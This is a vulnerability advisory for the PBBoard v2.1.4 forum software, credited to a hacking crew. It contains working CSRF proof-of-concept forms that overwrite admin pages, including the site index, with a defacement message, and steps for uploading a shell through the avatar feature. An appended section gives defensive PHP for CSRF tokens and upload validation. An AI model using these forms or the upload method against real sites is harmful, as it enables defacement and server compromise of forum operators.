Title: PBBoard v2.1.4 <= Multiple Vulnerabilities
Author: KedAns-Dz
Contact: ked-h@hotmail.com | ked-h@exploit-id.com | kedans@facebook.com
Facebook: http://facebook.com/KedAns
Script language: PHP
Vulnerability class: Multiple XSRF/FU
Tested on: Windows XP-SP3 Fr

###
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ------------------------------------------------- < |
##

# [1] XSRF/CSRF Add NeW File =>

<form action="http://[host]/admin.php?page=pages&add=1&start=1" name="myform" method="post">
  <input type="text" name="name" id="input_name" value="dz.html" size="30" />
  <textarea name="text" id="textarea_text" rows="17" cols="81" wrap="virtual" dir="/">
HaCked By KedAns-Dz
  </textarea>
  <input class="submit" type="submit" value="Submit/Save" name="submit" accesskey="s" />
</form>

# [2] XSRF/CSRF Change Index File =>

<form action="http://[host]/admin.php?page=pages&dit=1&start=1&id=1" name="myform" method="post">
  <input type="text" name="name" id="input_name" value="index.html" size="30" />
  <textarea name="text" id="textarea_text" rows="17" cols="81" wrap="virtual" dir="/">
HaCked By KedAns-Dz
  </textarea>
  <input class="submit" type="submit" value="Submit/Accept" name="submit" accesskey="s" />
</form>

# [3] Shell/File Upload :

# After registering, go to: /index.php?page=usercp&control=1&avatar=1&main=1
# Upload the shell {Ev!L}.txt, then find it at /download/avatar/{Ev!L}.txt

Fix: add filtering and validation to the code paths analysed above.
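
One way to apply the "filter and validate" fix to the admin forms in [1] and [2] and the avatar upload in [3], as an added example that is not PBBoard's own code or the advisory author's. The function names, the "csrf" field name and the 256 KiB size limit are assumptions made for illustration.

```php
<?php
// Added example, not PBBoard's own code; every function name here is hypothetical.

// Issue one random token per session; embed it as a hidden "csrf" field in admin forms.
function csrf_token(array &$session): string {
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Accept a state-changing request only if it is a POST carrying the session token.
function csrf_ok(string $method, array $post, array $session): bool {
    $sent = $post['csrf'] ?? '';
    $want = $session['csrf'] ?? '';
    return $method === 'POST' && is_string($sent) && is_string($want)
        && $want !== '' && hash_equals($want, $sent);
}

// Pick the stored avatar name from the file content, never from the client name.
// Returns null when the upload is not an allowed image type or is too large.
function avatar_store_name(string $tmpPath, int $maxBytes = 262144): ?string {
    $allowed = [IMAGETYPE_PNG => 'png', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_GIF => 'gif'];
    $size = @filesize($tmpPath);
    if ($size === false || $size === 0 || $size > $maxBytes) {
        return null;
    }
    $info = @getimagesize($tmpPath); // false unless an image header parses
    if ($info === false || !isset($allowed[$info[2]])) {
        return null;
    }
    return bin2hex(random_bytes(16)) . '.' . $allowed[$info[2]];
}

// Constructed demo inputs (not taken from the advisory).
$session = [];
$token = csrf_token($session);
var_dump(csrf_ok('POST', ['name' => 'index.html', 'text' => 'x'], $session)); // cross-site form: no token
var_dump(csrf_ok('POST', ['name' => 'index.html', 'csrf' => $token], $session)); // form rendered by the site

$txt = tempnam(sys_get_temp_dir(), 'av');
file_put_contents($txt, "plain text renamed as an avatar");
$gif = tempnam(sys_get_temp_dir(), 'av');
file_put_contents($gif, "GIF89a\x01\x00\x01\x00\x00\x00\x00");
var_dump(avatar_store_name($txt)); // text upload
var_dump(avatar_store_name($gif)); // GIF header
unlink($txt); unlink($gif);
```

In a real handler, pass $_SESSION and $_POST to these functions. The avatar directory should also be served with script execution disabled, since a header check alone does not guarantee that the rest of the file is harmless.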